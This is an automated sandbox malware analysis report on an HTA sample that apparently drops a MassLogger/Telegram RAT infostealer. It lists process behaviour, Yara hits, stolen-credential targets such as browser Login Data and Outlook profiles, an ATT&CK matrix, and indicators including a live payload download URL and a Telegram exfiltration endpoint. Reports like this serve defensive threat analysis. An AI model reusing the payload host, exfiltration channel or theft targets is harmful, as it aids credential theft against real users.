                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00064E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_00064E87
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00071E06 GetUserNameW,11_2_00071E06
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00063F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00063F3A
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_000349A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected MSIL Logger
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegSvcs.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vcc.exe PID: 7540, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7568, type: MEMORYSTR
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegSvcs.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vcc.exe PID: 7540, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7568, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegSvcs.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vcc.exe PID: 7540, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7568, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: vcc.exeBinary or memory string: WIN_81
                    Source: vcc.exeBinary or memory string: WIN_XP
                    Source: vcc.exeBinary or memory string: WIN_XPe
                    Source: vcc.exeBinary or memory string: WIN_VISTA
                    Source: vcc.exeBinary or memory string: WIN_7
                    Source: vcc.exeBinary or memory string: WIN_8
                    Source: vcc[1].exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegSvcs.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2497932312.0000000002936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vcc.exe PID: 7540, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7568, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected MSIL Logger
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegSvcs.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vcc.exe PID: 7540, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7568, type: MEMORYSTR
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegSvcs.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vcc.exe PID: 7540, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7568, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegSvcs.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.vcc.exe.3290000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vcc.exe PID: 7540, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7568, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000A6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_000A6283
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000A6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_000A6747

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		12
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts11
                    Command and Scripting Interpreter                    		2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		121
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts3
                    PowerShell                    		Logon Script (Windows)2
                    Valid Accounts                    		3
                    Obfuscated Files or Information                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares11
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS128
                    System Information Discovery                    		Distributed Component Object Model121
                    Input Capture                    		23
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		1
                    Masquerading                    		LSA Secrets231
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Valid Accounts                    		Cached Domain Credentials21
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1635005 Sample: kissingwithbestexperiencedg... Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 45 reallyfreegeoip.org 2->45 47 checkip.dyndns.org 2->47 49 checkip.dyndns.com 2->49 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 67 13 other signatures 2->67 10 mshta.exe 1 2->10         started        signatures3 65 Tries to detect the country of the analysis system (by using the IP) 45->65 process4 signatures5 77 Suspicious command line found 10->77 79 PowerShell case anomaly found 10->79 13 cmd.exe 1 10->13         started        process6 signatures7 81 Detected Cobalt Strike Beacon 13->81 83 Suspicious powershell command line found 13->83 85 PowerShell case anomaly found 13->85 16 powershell.exe 44 13->16         started        21 conhost.exe 13->21         started        process8 dnsIp9 43 23.95.235.28, 49687, 80 AS-COLOCROSSINGUS United States 16->43 35 C:\Users\user\AppData\Roaming\vcc.exe, PE32 16->35 dropped 37 C:\Users\user\AppData\Local\...\vcc[1].exe, PE32 16->37 dropped 39 C:\Users\user\AppData\...\qfzuxwqd.cmdline, Unicode 16->39 dropped 55 Loading BitLocker PowerShell Module 16->55 57 Powershell drops PE file 16->57 23 vcc.exe 2 16->23         started        26 csc.exe 3 16->26         started        file10 signatures11 process12 file13 69 Antivirus detection for dropped file 23->69 71 Multi AV Scanner detection for dropped file 23->71 73 Binary is likely a compiled AutoIt script file 23->73 75 3 other signatures 23->75 29 RegSvcs.exe 15 2 23->29         started        41 C:\Users\user\AppData\Local\...\qfzuxwqd.dll, PE32 26->41 dropped 33 cvtres.exe 1 26->33         started        signatures14 process15 dnsIp16 51 checkip.dyndns.com 132.226.247.73, 49688, 80 UTMEMUS United States 29->51 53 reallyfreegeoip.org 104.21.80.1, 443, 49689 CLOUDFLARENETUS United States 29->53 87 Tries to steal Mail credentials (via file / registry access) 29->87 89 Tries to harvest and steal browser information (history, passwords, etc) 29->89 signatures17

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    kissingwithbestexperiencedgirlfriendonhereformenice.hta30%VirustotalBrowse
                    kissingwithbestexperiencedgirlfriendonhereformenice.hta21%ReversingLabsScript-WScript.Trojan.Asthma

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\vcc.exe100%AviraTR/AVI.Agent.tqpct
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcc[1].exe100%AviraTR/AVI.Agent.tqpct
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcc[1].exe75%ReversingLabsWin32.Trojan.AutoitInject
                    C:\Users\user\AppData\Roaming\vcc.exe75%ReversingLabsWin32.Trojan.AutoitInject

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://23.95.235.28/560/vcc.exe0%Avira URL Cloudsafe
                    http://checkip.dyndns.com(0%Avira URL Cloudsafe
                    http://23.95.235.28/560/vcc.exe20%Avira URL Cloudsafe
                    http://23.95.235.28/560/vcc.exeh0%Avira URL Cloudsafe
                    http://23.95.235.28/560/vcc.exeowC:0%Avira URL Cloudsafe
                    http://crl.microjC0%Avira URL Cloudsafe
                    http://go.micNB0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		104.21.80.1
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		132.226.247.73
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            http://23.95.235.28/560/vcc.exetrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://checkip.dyndns.org/false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1363732240.0000000005819000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://23.95.235.28/560/vcc.exe2powershell.exe, 00000003.00000002.1380526589.0000000006EBD000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://reallyfreegeoip.orgdRegSvcs.exe, 0000000C.00000002.2497932312.000000000287D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 00000003.00000002.1363732240.0000000005819000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 00000003.00000002.1363732240.0000000005819000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://checkip.dyndns.orgRegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2497932312.000000000284E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://23.95.235.28/560/vcc.exehpowershell.exe, 00000003.00000002.1382287079.0000000007DB2000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://reallyfreegeoip.org/xml/8.46.123.189lRegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.comdRegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1360527053.00000000047B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://checkip.dyndns.com(RegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://checkip.dyndns.org/qvcc.exe, 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/powershell.exe, 00000003.00000002.1363732240.0000000005819000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1363732240.0000000005819000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://reallyfreegeoip.org/xml/8.46.123.189dRegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crl.microjCpowershell.exe, 00000003.00000002.1382287079.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://reallyfreegeoip.orgRegSvcs.exe, 0000000C.00000002.2497932312.000000000287D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://checkip.dyndns.orgdRegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://reallyfreegeoip.orgRegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://23.95.235.28/560/vcc.exeowC:powershell.exe, 00000003.00000002.1382287079.0000000007DB2000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://go.micNBpowershell.exe, 00000003.00000002.1358584579.000000000278F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://checkip.dyndns.comRegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://checkip.dyndns.org/dRegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1360527053.00000000047B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2497932312.00000000027E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://api.telegram.org/bot-/sendDocument?chat_id=vcc.exe, 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://reallyfreegeoip.org/xml/vcc.exe, 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2497932312.0000000002860000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  23.95.235.28
                                                                                  		unknownUnited States
                                                                                  		36352AS-COLOCROSSINGUStrue
                                                                                  104.21.80.1
                                                                                  		reallyfreegeoip.orgUnited States
                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                  132.226.247.73
                                                                                  		checkip.dyndns.comUnited States
                                                                                  		16989UTMEMUSfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1635005
                                                                                  Start date and time:2025-03-11 09:20:28 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 6m 56s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:17
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:kissingwithbestexperiencedgirlfriendonhereformenice.hta
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 62
                                                                                  • Number of non-executed functions: 263
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .hta

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 23.199.214.10, 20.12.23.50
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  04:21:25API Interceptor44x Sleep call for process: powershell.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  23.95.235.28niceskillbestexperiencegivenmegood.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                  • 23.95.235.28/550/vcc.exe
                                                                                  Nouvelle_commande9353834.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.95.235.28/xampp/vn/v/kissingwithbestexperiencedgirlfriendonhereformenice.hta
                                                                                  104.21.80.1PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                                                                                  • touxzw.ir/scc1/five/fre.php
                                                                                  DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rbopisalive.cyou/2dxw/
                                                                                  Marzec 2025-faktura.pdf.exeGet hashmaliciousFormBookBrowse
